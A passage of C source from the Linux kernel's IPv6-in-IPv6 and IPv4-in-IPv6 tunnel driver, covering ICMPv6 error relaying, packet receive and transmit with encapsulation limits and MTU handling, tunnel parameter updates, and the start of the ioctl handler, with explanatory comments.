		if ((*code) == ICMPV6_EXC_HOPLIMIT) {
			net_warn_ratelimited("%s: Too small hop limit or routing loop in tunnel!\n",
					     t->parms.name);
			rel_msg = 1;
		}
		break;
	case ICMPV6_PARAMPROB:
		teli = 0;
		if ((*code) == ICMPV6_HDR_FIELD)
			teli = ip6_tnl_parse_tlv_enc_lim(skb, skb->data);
		/* relay only when the offending field is our own
		 * encapsulation limit option */
		if (teli && teli == *info - 2) {
			tel = (struct ipv6_tlv_tnl_enc_lim *) &skb->data[teli];
			if (tel->encap_limit == 0) {
				net_warn_ratelimited("%s: Too small encapsulation limit or routing loop in tunnel!\n",
						     t->parms.name);
				rel_msg = 1;
			}
		} else {
			net_warn_ratelimited("%s: Recipient unable to parse tunneled packet!\n",
					     t->parms.name);
		}
		break;
	case ICMPV6_PKT_TOOBIG:
		/* subtract the tunnel overhead from the reported MTU and
		 * relay TOOBIG only if the inner packet exceeded it */
		mtu = *info - offset;
		if (mtu < IPV6_MIN_MTU)
			mtu = IPV6_MIN_MTU;
		t->dev->mtu = mtu;
		len = sizeof(*ipv6h) + ntohs(ipv6h->payload_len);
		if (len > mtu) {
			rel_type = ICMPV6_PKT_TOOBIG;
			rel_code = 0;
			rel_info = mtu;
			rel_msg = 1;
		}
		break;
	}
	*type = rel_type;
	*code = rel_code;
	*info = rel_info;
	*msg = rel_msg;
out:
	rcu_read_unlock();
	return err;
}
/* ICMPv6 error handler for IPv4-in-IPv6 tunnels: translate the outer
 * ICMPv6 error into an ICMPv4 error and send it to the inner IPv4
 * sender on a clone of the embedded packet. */
static int
ip4ip6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
	   u8 type, u8 code, int offset, __be32 info)
{
	int rel_msg = 0;
	u8 rel_type = type;
	u8 rel_code = code;
	__u32 rel_info = ntohl(info);
	int err;
	struct sk_buff *skb2;
	const struct iphdr *eiph;
	struct rtable *rt;
	struct flowi4 fl4;
	err = ip6_tnl_err(skb, IPPROTO_IPIP, opt, &rel_type, &rel_code,
			  &rel_msg, &rel_info, offset);
	if (err < 0)
		return err;
	if (rel_msg == 0)
		return 0;
	switch (rel_type) {
	case ICMPV6_DEST_UNREACH:
		if (rel_code != ICMPV6_ADDR_UNREACH)
			return 0;
		rel_type = ICMP_DEST_UNREACH;
		rel_code = ICMP_HOST_UNREACH;
		break;
	case ICMPV6_PKT_TOOBIG:
		if (rel_code != 0)
			return 0;
		rel_type = ICMP_DEST_UNREACH;
		rel_code = ICMP_FRAG_NEEDED;
		break;
	case NDISC_REDIRECT:
		rel_type = ICMP_REDIRECT;
		rel_code = ICMP_REDIR_HOST;
		/* NOTE(review): no break here, so this case falls through
		 * to "default: return 0" and the ICMP_REDIRECT handling
		 * further below appears unreachable -- confirm whether the
		 * fall-through is intentional before "fixing" it. */
	default:
		return 0;
	}
	if (!pskb_may_pull(skb, offset + sizeof(struct iphdr)))
		return 0;
	skb2 = skb_clone(skb, GFP_ATOMIC);
	if (!skb2)
		return 0;
	/* make skb2 look like the embedded original IPv4 packet */
	skb_dst_drop(skb2);
	skb_pull(skb2, offset);
	skb_reset_network_header(skb2);
	eiph = ip_hdr(skb2);
	/* Try to guess incoming interface */
	rt = ip_route_output_ports(dev_net(skb->dev), &fl4, NULL,
				   eiph->saddr, 0,
				   0, 0,
				   IPPROTO_IPIP, RT_TOS(eiph->tos), 0);
	if (IS_ERR(rt))
		goto out;
	skb2->dev = rt->dst.dev;
	/* route "incoming" packet */
	if (rt->rt_flags & RTCF_LOCAL) {
		ip_rt_put(rt);
		rt = NULL;
		rt = ip_route_output_ports(dev_net(skb->dev), &fl4, NULL,
					   eiph->daddr, eiph->saddr,
					   0, 0,
					   IPPROTO_IPIP,
					   RT_TOS(eiph->tos), 0);
		if (IS_ERR(rt) ||
		    rt->dst.dev->type != ARPHRD_TUNNEL) {
			if (!IS_ERR(rt))
				ip_rt_put(rt);
			goto out;
		}
		skb_dst_set(skb2, &rt->dst);
	} else {
		ip_rt_put(rt);
		if (ip_route_input(skb2, eiph->daddr, eiph->saddr, eiph->tos,
				   skb2->dev) ||
		    skb_dst(skb2)->dev->type != ARPHRD_TUNNEL)
			goto out;
	}
	/* change mtu on this route */
	if (rel_type == ICMP_DEST_UNREACH && rel_code == ICMP_FRAG_NEEDED) {
		if (rel_info > dst_mtu(skb_dst(skb2)))
			goto out;
		skb_dst(skb2)->ops->update_pmtu(skb_dst(skb2), NULL, skb2, rel_info);
	}
	if (rel_type == ICMP_REDIRECT)
		skb_dst(skb2)->ops->redirect(skb_dst(skb2), NULL, skb2);
	icmp_send(skb2, rel_type, rel_code, htonl(rel_info));
out:
	kfree_skb(skb2);
	return 0;
}
/* ICMPv6 error handler for IPv6-in-IPv6 tunnels: relay the (possibly
 * rewritten) ICMPv6 error to the inner IPv6 sender on a clone of the
 * embedded packet. */
static int
ip6ip6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
	   u8 type, u8 code, int offset, __be32 info)
{
	int rel_msg = 0;
	u8 rel_type = type;
	u8 rel_code = code;
	__u32 rel_info = ntohl(info);
	int err;
	err = ip6_tnl_err(skb, IPPROTO_IPV6, opt, &rel_type, &rel_code,
			  &rel_msg, &rel_info, offset);
	if (err < 0)
		return err;
	if (rel_msg && pskb_may_pull(skb, offset + sizeof(struct ipv6hdr))) {
		struct rt6_info *rt;
		struct sk_buff *skb2 = skb_clone(skb, GFP_ATOMIC);
		if (!skb2)
			return 0;
		/* make skb2 look like the embedded original packet */
		skb_dst_drop(skb2);
		skb_pull(skb2, offset);
		skb_reset_network_header(skb2);
		/* Try to guess incoming interface */
		rt = rt6_lookup(dev_net(skb->dev), &ipv6_hdr(skb2)->saddr,
				NULL, 0, 0);
		if (rt && rt->dst.dev)
			skb2->dev = rt->dst.dev;
		icmpv6_send(skb2, rel_type, rel_code, rel_info);
		ip6_rt_put(rt);
		kfree_skb(skb2);
	}
	return 0;
}
/* Post-decapsulation DSCP/ECN handling for an inner IPv4 packet:
 * optionally copy the outer header's DSCP into the inner IPv4 header,
 * then reconcile the ECN bits via the common helper. */
static int ip4ip6_dscp_ecn_decapsulate(const struct ip6_tnl *t,
				       const struct ipv6hdr *ipv6h,
				       struct sk_buff *skb)
{
	if (t->parms.flags & IP6_TNL_F_RCV_DSCP_COPY) {
		__u8 outer_dscp = ipv6_get_dsfield(ipv6h) & ~INET_ECN_MASK;

		ipv4_change_dsfield(ip_hdr(skb), INET_ECN_MASK, outer_dscp);
	}
	return IP6_ECN_decapsulate(ipv6h, skb);
}
/* Post-decapsulation DSCP/ECN handling for an inner IPv6 packet:
 * optionally copy the outer DSCP into the inner header, then reconcile
 * the ECN bits via the common helper. */
static int ip6ip6_dscp_ecn_decapsulate(const struct ip6_tnl *t,
				       const struct ipv6hdr *ipv6h,
				       struct sk_buff *skb)
{
	if (t->parms.flags & IP6_TNL_F_RCV_DSCP_COPY)
		ipv6_copy_dscp(ipv6_get_dsfield(ipv6h), ipv6_hdr(skb));
	return IP6_ECN_decapsulate(ipv6h, skb);
}
/* Compute the capability flags (XMIT/RCV/per-packet) for the endpoint
 * pair.  A wildcard endpoint defers the decision to a per-packet check;
 * otherwise both addresses must be unicast/multicast, loopback is
 * rejected, and link-local endpoints require a bound link. */
__u32 ip6_tnl_get_cap(struct ip6_tnl *t,
		      const struct in6_addr *laddr,
		      const struct in6_addr *raddr)
{
	struct __ip6_tnl_parm *p = &t->parms;
	int ltype = ipv6_addr_type(laddr);
	int rtype = ipv6_addr_type(raddr);
	__u32 flags = 0;
	if (ltype == IPV6_ADDR_ANY || rtype == IPV6_ADDR_ANY) {
		flags = IP6_TNL_F_CAP_PER_PACKET;
	} else if (ltype & (IPV6_ADDR_UNICAST|IPV6_ADDR_MULTICAST) &&
		   rtype & (IPV6_ADDR_UNICAST|IPV6_ADDR_MULTICAST) &&
		   !((ltype|rtype) & IPV6_ADDR_LOOPBACK) &&
		   (!((ltype|rtype) & IPV6_ADDR_LINKLOCAL) || p->link)) {
		if (ltype&IPV6_ADDR_UNICAST)
			flags |= IP6_TNL_F_CAP_XMIT;
		if (rtype&IPV6_ADDR_UNICAST)
			flags |= IP6_TNL_F_CAP_RCV;
	}
	return flags;
}
EXPORT_SYMBOL(ip6_tnl_get_cap);
/* called with rcu_read_lock() */
/* Decide whether a packet with the given outer addresses may be
 * received on this tunnel: @laddr must be one of our addresses (on the
 * configured link, if any, or be multicast) and @raddr must not be a
 * local address (which would indicate a routing loop). */
int ip6_tnl_rcv_ctl(struct ip6_tnl *t,
		    const struct in6_addr *laddr,
		    const struct in6_addr *raddr)
{
	struct __ip6_tnl_parm *p = &t->parms;
	int ret = 0;
	struct net *net = t->net;
	if ((p->flags & IP6_TNL_F_CAP_RCV) ||
	    ((p->flags & IP6_TNL_F_CAP_PER_PACKET) &&
	     (ip6_tnl_get_cap(t, laddr, raddr) & IP6_TNL_F_CAP_RCV))) {
		struct net_device *ldev = NULL;
		if (p->link)
			ldev = dev_get_by_index_rcu(net, p->link);
		if ((ipv6_addr_is_multicast(laddr) ||
		     likely(ipv6_chk_addr(net, laddr, ldev, 0))) &&
		    likely(!ipv6_chk_addr(net, raddr, NULL, 0)))
			ret = 1;
	}
	return ret;
}
EXPORT_SYMBOL_GPL(ip6_tnl_rcv_ctl);
/**
 * ip6_tnl_rcv - decapsulate IPv6 packet and retransmit it locally
 * @skb: received socket buffer
 * @protocol: ethernet protocol ID of the inner packet
 * @ipproto: tunnel payload protocol expected (parms.proto 0 means any)
 * @dscp_ecn_decapsulate: the function to decapsulate DSCP code and ECN
 *
 * Return: 0 when the packet was consumed (delivered or dropped),
 *	   1 when no matching tunnel was found (other handlers may try)
 **/
static int ip6_tnl_rcv(struct sk_buff *skb, __u16 protocol,
		       __u8 ipproto,
		       int (*dscp_ecn_decapsulate)(const struct ip6_tnl *t,
						   const struct ipv6hdr *ipv6h,
						   struct sk_buff *skb))
{
	struct ip6_tnl *t;
	const struct ipv6hdr *ipv6h = ipv6_hdr(skb);
	u8 tproto;
	int err;
	rcu_read_lock();
	t = ip6_tnl_lookup(dev_net(skb->dev), &ipv6h->saddr, &ipv6h->daddr);
	if (t != NULL) {
		struct pcpu_sw_netstats *tstats;
		/* drop payload protocols the tunnel isn't configured for */
		tproto = ACCESS_ONCE(t->parms.proto);
		if (tproto != ipproto && tproto != 0) {
			rcu_read_unlock();
			goto discard;
		}
		if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
			rcu_read_unlock();
			goto discard;
		}
		if (!ip6_tnl_rcv_ctl(t, &ipv6h->daddr, &ipv6h->saddr)) {
			t->dev->stats.rx_dropped++;
			rcu_read_unlock();
			goto discard;
		}
		/* strip the outer header and re-inject on the tunnel dev */
		skb->mac_header = skb->network_header;
		skb_reset_network_header(skb);
		skb->protocol = htons(protocol);
		memset(skb->cb, 0, sizeof(struct inet6_skb_parm));
		__skb_tunnel_rx(skb, t->dev, t->net);
		err = dscp_ecn_decapsulate(t, ipv6h, skb);
		if (unlikely(err)) {
			if (log_ecn_error)
				net_info_ratelimited("non-ECT from %pI6 with dsfield=%#x\n",
						     &ipv6h->saddr,
						     ipv6_get_dsfield(ipv6h));
			/* err > 1 means the packet must be dropped */
			if (err > 1) {
				++t->dev->stats.rx_frame_errors;
				++t->dev->stats.rx_errors;
				rcu_read_unlock();
				goto discard;
			}
		}
		tstats = this_cpu_ptr(t->dev->tstats);
		u64_stats_update_begin(&tstats->syncp);
		tstats->rx_packets++;
		tstats->rx_bytes += skb->len;
		u64_stats_update_end(&tstats->syncp);
		netif_rx(skb);
		rcu_read_unlock();
		return 0;
	}
	rcu_read_unlock();
	return 1;
discard:
	kfree_skb(skb);
	return 0;
}
/* Receive hook registered for IPPROTO_IPIP (IPv4-in-IPv6). */
static int ip4ip6_rcv(struct sk_buff *skb)
{
	return ip6_tnl_rcv(skb, ETH_P_IP, IPPROTO_IPIP,
			   ip4ip6_dscp_ecn_decapsulate);
}
/* Receive hook registered for IPPROTO_IPV6 (IPv6-in-IPv6). */
static int ip6ip6_rcv(struct sk_buff *skb)
{
	return ip6_tnl_rcv(skb, ETH_P_IPV6, IPPROTO_IPV6,
			   ip6ip6_dscp_ecn_decapsulate);
}
/* Pre-built destination-options block carrying the tunnel encapsulation
 * limit TLV, pushed onto outgoing packets when a limit is configured. */
struct ipv6_tel_txoption {
	struct ipv6_txoptions ops;
	__u8 dst_opt[8];
};
/* Fill @opt with an 8-byte destination options header: one tunnel
 * encapsulation limit TLV (type, len=1, value=@encap_limit) followed by
 * a 1-byte PadN option, and hook it up as dst0opt with opt_nflen 8. */
static void init_tel_txopt(struct ipv6_tel_txoption *opt, __u8 encap_limit)
{
	memset(opt, 0, sizeof(struct ipv6_tel_txoption));
	opt->dst_opt[2] = IPV6_TLV_TNL_ENCAP_LIMIT;
	opt->dst_opt[3] = 1;
	opt->dst_opt[4] = encap_limit;
	opt->dst_opt[5] = IPV6_TLV_PADN;
	opt->dst_opt[6] = 1;
	opt->ops.dst0opt = (struct ipv6_opt_hdr *) opt->dst_opt;
	opt->ops.opt_nflen = 8;
}
/**
 * ip6_tnl_addr_conflict - compare packet addresses to tunnel's own
 * @t: the outgoing tunnel device
 * @hdr: IPv6 header from the incoming packet
 *
 * Description:
 *   Avoid trivial tunneling loop by checking that tunnel exit-point
 *   doesn't match source of incoming packet.
 *
 * Return:
 *   1 if conflict,
 *   0 else
 **/
static inline bool
ip6_tnl_addr_conflict(const struct ip6_tnl *t, const struct ipv6hdr *hdr)
{
	return ipv6_addr_equal(&t->parms.raddr, &hdr->saddr);
}
/* Decide whether a packet may be transmitted on this tunnel: the local
 * address must be configured on this host (on the bound link, if any)
 * and the remote address must not be local (routing loop).  Warnings
 * are rate-limited via pr_warn on each rejected case. */
int ip6_tnl_xmit_ctl(struct ip6_tnl *t,
		     const struct in6_addr *laddr,
		     const struct in6_addr *raddr)
{
	struct __ip6_tnl_parm *p = &t->parms;
	int ret = 0;
	struct net *net = t->net;
	if ((p->flags & IP6_TNL_F_CAP_XMIT) ||
	    ((p->flags & IP6_TNL_F_CAP_PER_PACKET) &&
	     (ip6_tnl_get_cap(t, laddr, raddr) & IP6_TNL_F_CAP_XMIT))) {
		struct net_device *ldev = NULL;
		rcu_read_lock();
		if (p->link)
			ldev = dev_get_by_index_rcu(net, p->link);
		if (unlikely(!ipv6_chk_addr(net, laddr, ldev, 0)))
			pr_warn("%s xmit: Local address not yet configured!\n",
				p->name);
		else if (!ipv6_addr_is_multicast(raddr) &&
			 unlikely(ipv6_chk_addr(net, raddr, NULL, 0)))
			pr_warn("%s xmit: Routing loop! Remote address found on this node!\n",
				p->name);
		else
			ret = 1;
		rcu_read_unlock();
	}
	return ret;
}
EXPORT_SYMBOL_GPL(ip6_tnl_xmit_ctl);
/**
 * ip6_tnl_xmit2 - encapsulate packet and send
 * @skb: the outgoing socket buffer
 * @dev: the outgoing tunnel device
 * @dsfield: dscp code for outer header
 * @fl6: flow of tunneled packet
 * @encap_limit: encapsulation limit (< 0 means "do not send one")
 * @pmtu: Path MTU is stored if packet is too big
 *
 * Description:
 *   Build new header and do some sanity checks on the packet before
 *   sending it.
 *
 * Return:
 *   0 on success
 *   -1 fail
 *   %-EMSGSIZE message too big. return mtu in this case.
 **/
static int ip6_tnl_xmit2(struct sk_buff *skb,
			 struct net_device *dev,
			 __u8 dsfield,
			 struct flowi6 *fl6,
			 int encap_limit,
			 __u32 *pmtu)
{
	struct ip6_tnl *t = netdev_priv(dev);
	struct net *net = t->net;
	struct net_device_stats *stats = &t->dev->stats;
	struct ipv6hdr *ipv6h = ipv6_hdr(skb);
	struct ipv6_tel_txoption opt;
	struct dst_entry *dst = NULL, *ndst = NULL;
	struct net_device *tdev;
	int mtu;
	unsigned int max_headroom = sizeof(struct ipv6hdr);
	u8 proto;
	int err = -1;
	/* NBMA tunnel: no configured remote, resolve the destination from
	 * the packet's own neighbour entry */
	if (ipv6_addr_any(&t->parms.raddr)) {
		struct in6_addr *addr6;
		struct neighbour *neigh;
		int addr_type;
		if (!skb_dst(skb))
			goto tx_err_link_failure;
		neigh = dst_neigh_lookup(skb_dst(skb),
					 &ipv6_hdr(skb)->daddr);
		if (!neigh)
			goto tx_err_link_failure;
		addr6 = (struct in6_addr *)&neigh->primary_key;
		addr_type = ipv6_addr_type(addr6);
		if (addr_type == IPV6_ADDR_ANY)
			addr6 = &ipv6_hdr(skb)->daddr;
		memcpy(&fl6->daddr, addr6, sizeof(fl6->daddr));
		neigh_release(neigh);
	} else if (!fl6->flowi6_mark)
		/* the dst cache is only usable for unmarked flows */
		dst = ip6_tnl_dst_check(t);
	if (!ip6_tnl_xmit_ctl(t, &fl6->saddr, &fl6->daddr))
		goto tx_err_link_failure;
	if (!dst) {
		ndst = ip6_route_output(net, NULL, fl6);
		if (ndst->error)
			goto tx_err_link_failure;
		ndst = xfrm_lookup(net, ndst, flowi6_to_flowi(fl6), NULL, 0);
		if (IS_ERR(ndst)) {
			err = PTR_ERR(ndst);
			ndst = NULL;
			goto tx_err_link_failure;
		}
		dst = ndst;
	}
	tdev = dst->dev;
	/* routing the encapsulated packet back out of ourselves would loop */
	if (tdev == dev) {
		stats->collisions++;
		net_warn_ratelimited("%s: Local routing loop detected!\n",
				     t->parms.name);
		goto tx_err_dst_release;
	}
	mtu = dst_mtu(dst) - sizeof(*ipv6h);
	if (encap_limit >= 0) {
		/* the destination options block adds 8 bytes of overhead */
		max_headroom += 8;
		mtu -= 8;
	}
	if (mtu < IPV6_MIN_MTU)
		mtu = IPV6_MIN_MTU;
	if (skb_dst(skb))
		skb_dst(skb)->ops->update_pmtu(skb_dst(skb), NULL, skb, mtu);
	if (skb->len > mtu) {
		*pmtu = mtu;
		err = -EMSGSIZE;
		goto tx_err_dst_release;
	}
	/* scrub state when crossing netns boundaries */
	skb_scrub_packet(skb, !net_eq(t->net, dev_net(dev)));
	/*
	 * Okay, now see if we can stuff it in the buffer as-is.
	 */
	max_headroom += LL_RESERVED_SPACE(tdev);
	if (skb_headroom(skb) < max_headroom || skb_shared(skb) ||
	    (skb_cloned(skb) && !skb_clone_writable(skb, 0))) {
		struct sk_buff *new_skb;
		new_skb = skb_realloc_headroom(skb, max_headroom);
		if (!new_skb)
			goto tx_err_dst_release;
		if (skb->sk)
			skb_set_owner_w(new_skb, skb->sk);
		consume_skb(skb);
		skb = new_skb;
	}
	if (fl6->flowi6_mark) {
		/* marked flows take ownership of the route (not cached) */
		skb_dst_set(skb, dst);
		ndst = NULL;
	} else {
		skb_dst_set_noref(skb, dst);
	}
	skb->transport_header = skb->network_header;
	proto = fl6->flowi6_proto;
	if (encap_limit >= 0) {
		init_tel_txopt(&opt, encap_limit);
		ipv6_push_nfrag_opts(skb, &opt.ops, &proto, NULL);
	}
	if (likely(!skb->encapsulation)) {
		skb_reset_inner_headers(skb);
		skb->encapsulation = 1;
	}
	/* build the outer IPv6 header */
	skb_push(skb, sizeof(struct ipv6hdr));
	skb_reset_network_header(skb);
	ipv6h = ipv6_hdr(skb);
	ip6_flow_hdr(ipv6h, INET_ECN_encapsulate(0, dsfield),
		     ip6_make_flowlabel(net, skb, fl6->flowlabel, false));
	ipv6h->hop_limit = t->parms.hop_limit;
	ipv6h->nexthdr = proto;
	ipv6h->saddr = fl6->saddr;
	ipv6h->daddr = fl6->daddr;
	ip6tunnel_xmit(skb, dev);
	if (ndst)
		ip6_tnl_dst_store(t, ndst);
	return 0;
tx_err_link_failure:
	stats->tx_carrier_errors++;
	dst_link_failure(skb);
tx_err_dst_release:
	dst_release(ndst);
	return err;
}
/* Encapsulate an IPv4 packet into the tunnel.  Copies DSCP (and, when
 * configured, TOS-derived traffic class and fwmark) into the outer flow
 * and relays an ICMP FRAG_NEEDED error when the tunnel MTU is exceeded. */
static inline int
ip4ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
	struct ip6_tnl *t = netdev_priv(dev);
	const struct iphdr  *iph = ip_hdr(skb);
	int encap_limit = -1;
	struct flowi6 fl6;
	__u8 dsfield;
	__u32 mtu;
	u8 tproto;
	int err;
	tproto = ACCESS_ONCE(t->parms.proto);
	if (tproto != IPPROTO_IPIP && tproto != 0)
		return -1;
	if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
		encap_limit = t->parms.encap_limit;
	memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
	fl6.flowi6_proto = IPPROTO_IPIP;
	dsfield = ipv4_get_dsfield(iph);
	if (t->parms.flags & IP6_TNL_F_USE_ORIG_TCLASS)
		fl6.flowlabel |= htonl((__u32)iph->tos << IPV6_TCLASS_SHIFT)
					  & IPV6_TCLASS_MASK;
	if (t->parms.flags & IP6_TNL_F_USE_ORIG_FWMARK)
		fl6.flowi6_mark = skb->mark;
	err = ip6_tnl_xmit2(skb, dev, dsfield, &fl6, encap_limit, &mtu);
	if (err != 0) {
		/* XXX: send ICMP error even if DF is not set. */
		if (err == -EMSGSIZE)
			icmp_send(skb, ICMP_DEST_UNREACH, ICMP_FRAG_NEEDED,
				  htonl(mtu));
		return -1;
	}
	return 0;
}
/* Encapsulate an IPv6 packet into the tunnel.  Honors an inner
 * encapsulation-limit option (sending PARAMPROB when it is exhausted),
 * copies traffic class / flow label / fwmark as configured, and relays
 * PKT_TOOBIG when the tunnel MTU is exceeded. */
static inline int
ip6ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
	struct ip6_tnl *t = netdev_priv(dev);
	struct ipv6hdr *ipv6h = ipv6_hdr(skb);
	int encap_limit = -1;
	__u16 offset;
	struct flowi6 fl6;
	__u8 dsfield;
	__u32 mtu;
	u8 tproto;
	int err;
	tproto = ACCESS_ONCE(t->parms.proto);
	if ((tproto != IPPROTO_IPV6 && tproto != 0) ||
	    ip6_tnl_addr_conflict(t, ipv6h))
		return -1;
	offset = ip6_tnl_parse_tlv_enc_lim(skb, skb_network_header(skb));
	if (offset > 0) {
		/* inner packet carries its own encapsulation limit */
		struct ipv6_tlv_tnl_enc_lim *tel;
		tel = (struct ipv6_tlv_tnl_enc_lim *)&skb_network_header(skb)[offset];
		if (tel->encap_limit == 0) {
			icmpv6_send(skb, ICMPV6_PARAMPROB,
				    ICMPV6_HDR_FIELD, offset + 2);
			return -1;
		}
		encap_limit = tel->encap_limit - 1;
	} else if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
		encap_limit = t->parms.encap_limit;
	memcpy(&fl6, &t->fl.u.ip6, sizeof(fl6));
	fl6.flowi6_proto = IPPROTO_IPV6;
	dsfield = ipv6_get_dsfield(ipv6h);
	if (t->parms.flags & IP6_TNL_F_USE_ORIG_TCLASS)
		fl6.flowlabel |= (*(__be32 *) ipv6h & IPV6_TCLASS_MASK);
	if (t->parms.flags & IP6_TNL_F_USE_ORIG_FLOWLABEL)
		fl6.flowlabel |= ip6_flowlabel(ipv6h);
	if (t->parms.flags & IP6_TNL_F_USE_ORIG_FWMARK)
		fl6.flowi6_mark = skb->mark;
	err = ip6_tnl_xmit2(skb, dev, dsfield, &fl6, encap_limit, &mtu);
	if (err != 0) {
		if (err == -EMSGSIZE)
			icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, mtu);
		return -1;
	}
	return 0;
}
/* ndo_start_xmit entry point: dispatch on the inner protocol.  Any
 * other protocol, or a failed encapsulation, is counted as a tx error
 * and the packet is dropped (the device itself always "succeeds"). */
static netdev_tx_t
ip6_tnl_xmit(struct sk_buff *skb, struct net_device *dev)
{
	struct ip6_tnl *t = netdev_priv(dev);
	struct net_device_stats *stats = &t->dev->stats;
	int ret;
	switch (skb->protocol) {
	case htons(ETH_P_IP):
		ret = ip4ip6_tnl_xmit(skb, dev);
		break;
	case htons(ETH_P_IPV6):
		ret = ip6ip6_tnl_xmit(skb, dev);
		break;
	default:
		goto tx_err;
	}
	if (ret < 0)
		goto tx_err;
	return NETDEV_TX_OK;
tx_err:
	stats->tx_errors++;
	stats->tx_dropped++;
	kfree_skb(skb);
	return NETDEV_TX_OK;
}
/* Derive device state from the tunnel parameters: device addresses, the
 * flowi template used on transmit, capability flags, the point-to-point
 * flag and -- when a route to the remote exists -- header length and MTU. */
static void ip6_tnl_link_config(struct ip6_tnl *t)
{
	struct net_device *dev = t->dev;
	struct __ip6_tnl_parm *p = &t->parms;
	struct flowi6 *fl6 = &t->fl.u.ip6;
	memcpy(dev->dev_addr, &p->laddr, sizeof(struct in6_addr));
	memcpy(dev->broadcast, &p->raddr, sizeof(struct in6_addr));
	/* Set up flowi template */
	fl6->saddr = p->laddr;
	fl6->daddr = p->raddr;
	fl6->flowi6_oif = p->link;
	fl6->flowlabel = 0;
	/* fixed tclass/flowlabel apply only when not copied per-packet */
	if (!(p->flags&IP6_TNL_F_USE_ORIG_TCLASS))
		fl6->flowlabel |= IPV6_TCLASS_MASK & p->flowinfo;
	if (!(p->flags&IP6_TNL_F_USE_ORIG_FLOWLABEL))
		fl6->flowlabel |= IPV6_FLOWLABEL_MASK & p->flowinfo;
	p->flags &= ~(IP6_TNL_F_CAP_XMIT|IP6_TNL_F_CAP_RCV|IP6_TNL_F_CAP_PER_PACKET);
	p->flags |= ip6_tnl_get_cap(t, &p->laddr, &p->raddr);
	if (p->flags&IP6_TNL_F_CAP_XMIT && p->flags&IP6_TNL_F_CAP_RCV)
		dev->flags |= IFF_POINTOPOINT;
	else
		dev->flags &= ~IFF_POINTOPOINT;
	dev->iflink = p->link;
	if (p->flags & IP6_TNL_F_CAP_XMIT) {
		int strict = (ipv6_addr_type(&p->raddr) &
			      (IPV6_ADDR_MULTICAST|IPV6_ADDR_LINKLOCAL));
		struct rt6_info *rt = rt6_lookup(t->net,
						 &p->raddr, &p->laddr,
						 p->link, strict);
		if (rt == NULL)
			return;
		/* account for the outer IPv6 header (plus the 8-byte
		 * destination options block when an encap limit is sent) */
		if (rt->dst.dev) {
			dev->hard_header_len = rt->dst.dev->hard_header_len +
				sizeof(struct ipv6hdr);
			dev->mtu = rt->dst.dev->mtu - sizeof(struct ipv6hdr);
			if (!(t->parms.flags & IP6_TNL_F_IGN_ENCAP_LIMIT))
				dev->mtu -= 8;
			if (dev->mtu < IPV6_MIN_MTU)
				dev->mtu = IPV6_MIN_MTU;
		}
		ip6_rt_put(rt);
	}
}
/**
* ip6_tnl_change - update the tunnel parameters
* @t: tunnel to be changed
* @p: tunnel configuration parameters
*
* Description:
* ip6_tnl_change() updates the tunnel parameters
**/
static int
ip6_tnl_change(struct ip6_tnl *t, const struct __ip6_tnl_parm *p)
{
/* Copy the new parameters, then invalidate the cached dst and
 * re-derive device configuration. NOTE(review): appears to rely on
 * the caller holding RTNL (ioctl/netlink paths) — confirm.
 */
t->parms.laddr = p->laddr;
t->parms.raddr = p->raddr;
t->parms.flags = p->flags;
t->parms.hop_limit = p->hop_limit;
t->parms.encap_limit = p->encap_limit;
t->parms.flowinfo = p->flowinfo;
t->parms.link = p->link;
t->parms.proto = p->proto;
ip6_tnl_dst_reset(t);
ip6_tnl_link_config(t);
return 0;
}
/* Apply new parameters to an existing tunnel: unlink it from the hash so
 * lookups stop matching the stale keys, wait for concurrent readers,
 * update, re-link under the (possibly new) keys, and notify userspace.
 */
static int ip6_tnl_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p)
{
struct net *net = t->net;
struct ip6_tnl_net *ip6n = net_generic(net, ip6_tnl_net_id);
int err;
ip6_tnl_unlink(ip6n, t);
synchronize_net();
err = ip6_tnl_change(t, p);
ip6_tnl_link(ip6n, t);
netdev_state_change(t->dev);
return err;
}
static int ip6_tnl0_update(struct ip6_tnl *t, struct __ip6_tnl_parm *p)
{
/* for default tnl0 device allow to change only the proto */
t->parms.proto = p->proto;
netdev_state_change(t->dev);
return 0;
}
/* Translate the userspace ioctl layout (ip6_tnl_parm) into the kernel's
 * internal parameter struct, field by field.
 */
static void
ip6_tnl_parm_from_user(struct __ip6_tnl_parm *p, const struct ip6_tnl_parm *u)
{
p->laddr = u->laddr;
p->raddr = u->raddr;
p->flags = u->flags;
p->hop_limit = u->hop_limit;
p->encap_limit = u->encap_limit;
p->flowinfo = u->flowinfo;
p->link = u->link;
p->proto = u->proto;
memcpy(p->name, u->name, sizeof(u->name));
}
/* Inverse of ip6_tnl_parm_from_user(): fill the userspace ioctl layout
 * from the kernel's internal parameter struct.
 */
static void
ip6_tnl_parm_to_user(struct ip6_tnl_parm *u, const struct __ip6_tnl_parm *p)
{
u->laddr = p->laddr;
u->raddr = p->raddr;
u->flags = p->flags;
u->hop_limit = p->hop_limit;
u->encap_limit = p->encap_limit;
u->flowinfo = p->flowinfo;
u->link = p->link;
u->proto = p->proto;
memcpy(u->name, p->name, sizeof(u->name));
}
/**
* ip6_tnl_ioctl - configure ipv6 tunnels from userspace
* @dev: virtual device associated with tunnel
* @ifr: parameters passed from userspace
* @cmd: command to be performed
*
* Description:
* ip6_tnl_ioctl() is used for managing IPv6 tunnels
* from userspace.
*
* The possible commands are the following:
* %SIOCGETTUNNEL: get tunnel parameters for device
* %SIOCADDTUNNEL: add tunnel matching given tunnel parameters
* %SIOCCHGTUNNEL: change tunnel parameters to those given
* %SIOCDELTUNNEL: delete tunnel
*
* The fallback device "ip6tnl0", created during module
* initialization, can be used for creating other tunnel devices.
*
* Return:
* 0 on success,
* %-EFAULT if unable to copy data to or from userspace,
* %-EPERM if current process hasn't %CAP_NET_ADMIN set
* %-EINVAL if passed tunnel parameters are invalid,
* %-EEXIST if changing a tunnel's parameters would cause a conflict
* %-ENODEV if attempting to change or delete a nonexisting device
**/
static int
ip6_tnl_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
{
int err = 0;
struct ip6_tnl_parm p;
struct __ip6_tnl_parm p1;
